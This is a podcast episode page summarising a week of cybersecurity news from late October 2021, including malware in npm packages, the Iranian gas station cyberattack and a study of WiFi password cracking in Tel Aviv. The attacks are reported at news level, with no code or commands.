HomePodcastCyber Security HeadlinesCyber Security Headlines - Week in Review – Oct 25-29, 2021

Cyber Security Headlines – Week in Review – Oct 25-29, 2021

This week’s Cyber Security Headlines – Week in Review, Oct 25-29, is hosted by Rich Stroffolino with our guest, Jason Fruge, CISO, Rent-a-Center

Cyber Security Headlines – Week in Review is live every Friday at 12:30pm PT/3:30pm ET. Join us each week by registering for the open discussion.

Crypto-miner and malware found hidden inside npm libraries

Sonatype has uncovered crypto-mining malware hidden inside three JavaScript libraries uploaded on the official npm package repository. The three files, disguised as user-agent string parsers, can detect the user’s operating system and then run a BAT or Shell script, based on the victim’s platform, downloading an externally-hosted EXE or a Linux ELF, and executing the binary with arguments specifying the mining pool to use, the wallet to mine cryptocurrency for, and the number of CPU threads to utilize. The three npm packages were: klow, klown, and okhsa, and were live only for a day, on October 15. In a related but separate story, a critical severity advisory was posted on GitHub on Friday and mentioned in CISA’s website, warning of embedded malware in three versions of ua-parser-js, which is used in apps and websites to discover the type of device or browser a person is using from User-Agent data. CISA urges users and administrators using compromised ua-parser-js versions 0.7.29, 0.8.0, and 1.0.0 to update to the respective patched versions.

(The Record, CISA, and GitHub)

Facebook sues Ukrainian who scraped the data of 178 million users

Facebook alleges that Alexander Alexandrovich Solonchenko of Kirovograd, Ukraine abused a feature of Facebook Messenger called Contact Importer, which allows users to synchronize their phone address books to find friends. Between January 2018 and September 2019, Solonchenko allegedly used an automated tool to pose as Android devices in order to feed Facebook servers with millions of random phone numbers. As Facebook servers returned information for which phone numbers had an account on the site, Solonchenko collected the data, which he later offered for sale on RaidForums.

(The Record)

BlackMatter ransomware victims quietly helped using secret decryptor

Soon after the BlackMatter ransomware operation launched, Emsisoft discovered a flaw allowing them to create a decryptor recover victim’s files. Emsisoft immediately alerted law enforcement, ransomware negotiations firms, incident response firms, CERTS worldwide, and trusted partners with information about the decryptor, choosing to keep things quiet so as to not alert the ransomware gangs to the flaws. As victims started refusing to pay, BlackMatter grew increasingly suspicious and angry with ransomware negotiators, to the point of sending death threats.

(Bleeping Computer)

Microsoft report on Nobelium

Microsoft announced the Nobelium threat group, previously behind the SolarWinds supply chain attack, has breached at least 14 managed service and cloud providers since May 2021. Overall Microsoft said 609 customers were notified of 22,868 attacks between July and October, although Nobelium saw a low single digit success rate. To put the scale of this activity into context, Microsoft said this is more than all of the notifications about attacks from state-affiliated groups it sent to customers in the three years prior to July 2021. While the organization is constantly changing tactics and attack vectors, it’s overall mission appears to be gaining long-term access to the systems of targets of interest and establish espionage and exfiltration channels.

Healthcare organizations struggle with breaches

A new report from the Ponemon Institute and SecureLink found that in the last 12 months, 44% of healthcare organizations surveyed have experienced a data breach caused by a third-party. Part of the problem comes from the fact that these organizations are not equipped to properly monitor third-parties, with only 41% saying they had a comprehensive inventory of third parties with access to critical systems, and only 44% having visibility into levels of access from internal and external users. (VentureBeat)

Thanks to our episode sponsor, Banyan Security

Today, 75% of enterprises are using some form of hybrid-cloud deployment. Unfortunately, traditional network-centric security solutions like VPNs are not designed to meet the scale, performance, and usability needs of modern organizations, especially those with dynamic hybrid- and multi-cloud environments.
Replace your traditional network access boxes – VPNs, bastion hosts, and gateways – with a cloud-based zero trust remote access solution and enable a safe and reliable “work from anywhere” environment. Visit banyansecurity.io for more information.

Iranian gas stations out of service after cyberattack

The National Iranian Oil Products Distribution Company (NIOPDC), who operate a network of more than 3,500 gas stations across Iran, saw gas station operations come to a halt Tuesday due to a cyberattack, leaving Iranians waiting in gas station lines for hours. As news of the incident spread, a string of hacks on electronic road billboards displayed messages demanding an explanation or asking for fuel. One message reading “cyberattack 64411”, appears to make reference to a cyberattack in July that disrupted Iran’s train service. The BBC reports that Iran’s Supreme Council of Cyberspace believes the incident is state-sponsored, although it’s too early to say which country is responsible.

(Bleeping Computer)

Researcher cracked 70% of sampled WiFi networks

CyberArk security researcher Ido Hoorvitch has managed to crack 70% of a 5,000 WiFi network sample in his hometown, Tel Aviv.  The researcher roamed the city armed with a $50 network card and a freeware sniffing setup comprised of WireShark on UbuntuWiFi to gather hashes and then exploited a flaw that allows the retrieval of the PMKID hash. Using a standard laptop and a dictionary attack using the Rockyou dictionary file, the researcher cracked 3,359 passwords many of which were set to the user’s cell phone numbers or used a weak passwords comprised of only lower-case characters. The research highlights that many home networks are easy to hijack and to better protect them, home users should set passwords at least ten characters long with a mix of lower case and upper case letters, symbols and digits. Further, it is recommended that users also disable both roaming and WPS, if they are supported by their router.

(Bleeping Computer)


Half of home workers buy potentially insecure technology 

Incidents of shadow IT have snowballed during the pandemic as remote workers bought devices without vetting from the IT department, a new report from HP has warned. Based on a global survey of 1100 IT decision-makers and a separate poll of more than 8400 home workers in the US, the UK, Mexico, Germany, Australia, Canada, and Japan, 45% said they’d bought IT equipment such as printers or PCs to support home working over the past year. However, 68% said security wasn’t as big a consideration as other factors like price or functionality when purchasing, and 43% didn’t have their new laptop or PC checked or installed by IT. The report also says 70% of home workers who had clicked on malicious phishing emails said they didn’t report it to IT.

(Infosecurity Magazine)

Nearly all US execs have experienced a cybersecurity threat, but some say there’s still no plan

On Tuesday, Deloitte published the results of a new survey, taking place between June 6 and August 24, 2021, which includes the responses of 577 C-suite executives worldwide (159 in the US). The research — including insight from those in CEO, CISO, and other leadership roles — suggests that 98% of US executives have come across at least one cybersecurity event over the past year. The research suggests that the common consequences experienced by today’s firms after an incident include disruption, a drop in share value, intellectual property theft, damage to reputation that prompts a loss in customer trust, and a change in leadership roles. Of interest in the report is that rather than malware, phishing, or data breaches being a top concern, 27% of executives said they were most worried about the actions of “well-meaning” employees who may inadvertently create avenues for attackers to exploit.



Most Popular